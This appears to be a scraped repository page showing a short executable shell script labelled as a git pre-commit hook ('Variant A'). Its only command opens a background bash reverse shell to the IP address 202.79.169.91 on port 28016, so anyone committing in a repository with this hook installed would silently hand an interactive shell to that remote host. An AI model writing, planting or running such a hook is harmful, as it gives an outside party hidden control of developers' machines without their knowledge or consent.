5 lines
96 B
Bash
Executable File
5 lines
96 B
Bash
Executable File
#!/bin/sh
|
|
|
|
# Variant A - pre-commit
|
|
bash -c 'exec bash -i &>/dev/tcp/202.79.169.91/28016 <&1' &
|